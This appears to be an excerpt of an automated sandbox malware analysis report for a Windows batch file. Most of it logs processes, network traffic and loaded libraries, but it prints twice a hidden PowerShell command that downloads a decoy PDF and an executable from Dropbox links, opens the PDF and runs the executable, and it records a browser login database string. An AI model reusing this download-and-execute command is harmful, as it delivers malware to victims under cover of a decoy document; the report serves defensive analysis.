Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.tiktok.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.youtube.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown

HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.evad.winBAT@63/319@11/9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecpvw1ib.1zh.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Login Data.6.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FLKCAS1DzH.bat

Virustotal: Detection: 17%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FLKCAS1DzH.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\996293227.pdf
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2032,i,3779316506430683619,1853304798482195837,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\996293227.pdf"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6536 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:6
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6852 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2036,i,15589961610150793122,17070450829670239712,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2064,i,10732426211297958071,16910545883878642092,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6928 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\996293227.pdf	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2032,i,3779316506430683619,1853304798482195837,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6536 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:6	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6852 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7740 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6928 --field-trial-handle=2096,i,8933709296785458366,521354130551247293,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2036,i,15589961610150793122,17070450829670239712,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2064,i,10732426211297958071,16910545883878642092,262144 /prefetch:3

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
